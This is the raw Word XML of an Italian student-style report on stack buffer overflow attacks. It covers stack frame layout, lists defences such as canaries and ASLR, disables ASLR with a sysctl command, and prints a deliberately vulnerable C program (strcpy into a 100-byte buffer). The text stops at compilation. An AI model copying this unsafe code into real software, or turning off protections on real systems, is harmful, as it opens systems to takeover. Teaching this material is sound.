            <wp:extent cx="3607120" cy="129606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120" cy="129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B372" w14:textId="79094BC9" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00A7298C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 xml:space="preserve">Struttura dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920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Pr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> in memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBE264" w14:textId="77777777" w:rsidR="00A7298C" w:rsidRPr="00711920" w:rsidRDefault="00A7298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45354A33" w14:textId="33D6382E" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="003109D2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 xml:space="preserve">Quando viene eseguite una funzione all’interno del programma verrà automaticamente allocato in memoria </w:t>
      </w:r>
      <w:r w:rsidR="00B85042" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">un blocco di memoria </w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">chiamato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920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Pr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> frame, composto da quattro regioni principali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DAF2B4" w14:textId="5BB49AF8" w:rsidR="003109D2" w:rsidRPr="00711920" w:rsidRDefault="003109D2" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Arguments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="00C75F93" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> questa regione memorizza gli argomenti passati alla funzione,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEAF84" w14:textId="7C4706D7" w:rsidR="003109D2" w:rsidRPr="00711920" w:rsidRDefault="003109D2" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Return </w:t>
      </w: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Address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="00C75F93" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> indirizzo a cui il programma </w:t>
      </w:r>
      <w:r w:rsidR="00E144C2" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">tornerà </w:t>
      </w:r>
      <w:r w:rsidR="00B728BF" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>una vota terminata la funzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3F46E" w14:textId="02364773" w:rsidR="003109D2" w:rsidRPr="00711920" w:rsidRDefault="003109D2" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Previous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 xml:space="preserve"> Frame Pointer:</w:t>
      </w:r>
      <w:r w:rsidR="00C75F93" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> puntatore allo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C75F93" w:rsidRPr="00711920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="00C75F93" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> frame precedente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEE4B79" w14:textId="35CDF039" w:rsidR="003109D2" w:rsidRPr="00711920" w:rsidRDefault="003109D2" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Local </w:t>
      </w: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Variables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="00C75F93" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> regione in cui vengono memorizzate le variabili locale della funzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C881E" w14:textId="406B2963" w:rsidR="00BD1300" w:rsidRPr="00711920" w:rsidRDefault="00BD1300" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA599D3" w14:textId="229A36AA" w:rsidR="00EE265D" w:rsidRPr="00711920" w:rsidRDefault="00EE265D" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Copiare e trasferire dati all’interno della memoria è un task estremamente comune all’interno dei programmi. Ma dato che un programma necessita di allocare la memoria prima di poterci scrivere, spesso succede che lo spazio allocato non è sufficiente a contenere tutti i dati che si ha intenzione di memorizzare, questo è detto overflow. Alcuni linguaggi di programmazione gestiscono questo problema in maniera automatica (tipo Java) mentre altri affidano il compito al programmatore (C e C++). Questo potrebbe portare a dei seri rischi di compromissione della sicurezza del sistema su cui si sta lavorando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701524F" w14:textId="1AB3DE48" w:rsidR="00EE265D" w:rsidRPr="00711920" w:rsidRDefault="00EE265D" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">L’attacco di Buffer Overflow punta appunto su questa debolezza di alcuni linguaggi di programmazione, andando a memorizzare stringhe di lunghezza superiore alla dimensione consentita dal buffer, andando a sovrascrivere valori sensibili presenti all’interno dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004A0CD6" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">come ad </w:t>
      </w:r>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">esempio dovesse essere sovrascritto il Return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> la funzione, una volta eseguita, non tornerà all’indirizzo di memoria predestinato</w:t>
      </w:r>
      <w:r w:rsidR="004A0CD6" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bensì ad uno nuovo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F803A8" w14:textId="5A459CA3" w:rsidR="001863A0" w:rsidRPr="00711920" w:rsidRDefault="00E20032" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Un attacco di tipo Buffer Overflow potrebbe quindi portare a far terminare un certo programma o ancora peggio prendere il controllo del programma o addirittura sistema stesso da parte dell’attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36154FAB" w14:textId="77777777" w:rsidR="00FA7AFA" w:rsidRDefault="00FA7AFA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439DEA8" w14:textId="06564157" w:rsidR="00BD1300" w:rsidRPr="00711920" w:rsidRDefault="00FA7AFA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3) </w:t>
      </w:r>
      <w:r w:rsidR="00BD1300" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Protezioni contro Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265141D3" w14:textId="475E45D2" w:rsidR="00BD1300" w:rsidRPr="00711920" w:rsidRDefault="00BD1300" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA67AB" w14:textId="55059DFB" w:rsidR="00BD1300" w:rsidRPr="00711920" w:rsidRDefault="00BD1300" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Address Space Layout Randomization (ASLR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211871C6" w14:textId="77777777" w:rsidR="007630AA" w:rsidRPr="00711920" w:rsidRDefault="00BD1300" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Executable Space Protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CC768" w14:textId="65164AFD" w:rsidR="00BD1300" w:rsidRPr="00711920" w:rsidRDefault="007630AA" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: ???</w:t>
      </w:r>
      <w:r w:rsidR="00A7298C" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129D8D8" w14:textId="03D7D9D4" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00FA7AFA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4) </w:t>
      </w:r>
      <w:r w:rsidR="00840516" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio </w:t>
      </w:r>
      <w:r w:rsidR="0029364E" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">documentato </w:t>
      </w:r>
      <w:r w:rsidR="00840516" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>di attacco Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF74553" w14:textId="37253504" w:rsidR="00840516" w:rsidRPr="00711920" w:rsidRDefault="00840516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96FB75E" w14:textId="521B6663" w:rsidR="00BB201F" w:rsidRPr="00A22DD2" w:rsidRDefault="00BB201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>Caratteristiche macchine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4AB930" w14:textId="728652A8" w:rsidR="00BB201F" w:rsidRPr="00A22DD2" w:rsidRDefault="00BB201F" w:rsidP="009B725E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">Sistema operativo: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Ubuntu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16.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DD9F0" w14:textId="664B4176" w:rsidR="00BB201F" w:rsidRPr="00A22DD2" w:rsidRDefault="00BB201F" w:rsidP="009B725E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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>Processore:</w:t>
      </w:r>
      <w:r w:rsidR="009B725E" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intel(R) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009B725E" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Core(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009B725E" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>TM) M-5Y71 CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A60CE" w14:textId="27F5E6DA" w:rsidR="00BB201F" w:rsidRPr="00A22DD2" w:rsidRDefault="00BB201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D39F6DF" w14:textId="5CFB8401" w:rsidR="009B725E" w:rsidRPr="00A22DD2" w:rsidRDefault="00A22DD2" w:rsidP="00A22DD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/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</w:pPr>
      <w:r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 xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="006E43FE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>Disabilitare ASLR del sistema</w:t>
      </w:r>
      <w:r w:rsidR="002E1543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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F826E6A" w14:textId="333D461B" w:rsidR="009B725E" w:rsidRPr="00A22DD2" w:rsidRDefault="002E1543" w:rsidP="000500D2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22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Come descritto nella sezione precedente, una delle contromisure adottate contro la vulnerabilità di BO è proprio l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Space Layout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Randomization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ASLR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Per questo motivo prima di procedere con l’implementazione di questo attacco è necessario disabilitarlo (almeno temporaneamente) </w:t>
      </w:r>
      <w:r w:rsidR="000500D2" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sul sistema in questione.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201F" w:rsidRPr="00A22DD2" w14:paraId="2794B040" w14:textId="77777777" w:rsidTr="00E21EA7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72487A7" w14:textId="77777777" w:rsidR="00BB201F" w:rsidRDefault="00BB201F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  <w:bookmarkStart w:id="0" w:name="_Hlk27053812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 xml:space="preserve">$ sudo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sysctl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 xml:space="preserve"> -w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kernel.randomize</w:t>
            </w:r>
            <w:proofErr w:type="gram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_va_space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=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6587D8CA" w14:textId="376930DF" w:rsidR="001B651B" w:rsidRPr="00A22DD2" w:rsidRDefault="001B651B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  <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>kernel.randomize</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_va_space</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p w14:paraId="3E254718" w14:textId="3655EEA0" w:rsidR="00BB201F" w:rsidRPr="00A22DD2" w:rsidRDefault="00BB201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6B1541AC" w14:textId="53038278" w:rsidR="009B725E" w:rsidRPr="00A22DD2" w:rsidRDefault="00A22DD2" w:rsidP="00A22DD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/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</w:pPr>
      <w:r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 xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="006E43FE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>Creare u</w:t>
      </w:r>
      <w:r w:rsidR="00E93A64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 xml:space="preserve">n esempio di </w:t>
      </w:r>
      <w:r w:rsidR="006E43FE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>programma vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A81E7" w14:textId="163F0DCE" w:rsidR="000500D2" w:rsidRPr="00A22DD2" w:rsidRDefault="000500D2" w:rsidP="000500D2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>Un programma potrebbe essere soggetto ad un attacco di tipo BO se e solo se prende in input dati dall’utente. Il programma che quindi andremo a creare andrà a prendere in input dati da parte dell’utente, come la maggior parte dei programmi reali.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C015834" w14:textId="7ED211A2" w:rsidR="000500D2" w:rsidRPr="00A22DD2" w:rsidRDefault="000500D2" w:rsidP="000500D2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b/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Programma vulnerabile: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stack.c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B725E" w:rsidRPr="00A22DD2" w14:paraId="393F4CF5" w14:textId="77777777" w:rsidTr="00281380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217707C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/* This program has a buffer overflow vulnerability. */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48431F69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#include &lt;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stdlib.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5218DB3B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#include &lt;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stdio.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9F4957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#include &lt;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string.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCD5F74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64D3BE9A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int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foo(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char *str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A441581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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F9BD7F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 xml:space="preserve">char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buffer[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100];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E77D7D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>/* The following statement has a buffer overflow problem */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C601C5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strcpy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buffer, str);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553EC8D8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>return 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ABDDFC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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306FEC62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0CC2B4A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int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main(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int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argc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, char **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argv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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A59EDC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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43CC23C1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 xml:space="preserve">char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str[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400];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0984880C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>FILE *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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C63DB2C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DDC0445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=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fopen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"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", "r");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9CAA60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fread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str,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sizeof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(char), 300,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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01410084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>foo(str);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35BD810D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420C92EF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printf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"Returned Properly\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776DBD80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>return 1;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02595C87" w14:textId="480BE02B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lastRenderedPageBreak/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DD2ACE0" w14:textId="25532444" w:rsidR="000500D2" w:rsidRPr="00A22DD2" w:rsidRDefault="000500D2" w:rsidP="000500D2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lastRenderedPageBreak/>
        <w:t>A questo punto</w:t>
      </w:r>
      <w:r w:rsidR="00DA0627" w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> si procede con la compilazione del codice vulnerabile sopra riportato. </w:t>
      </w:r>
    </w:p>
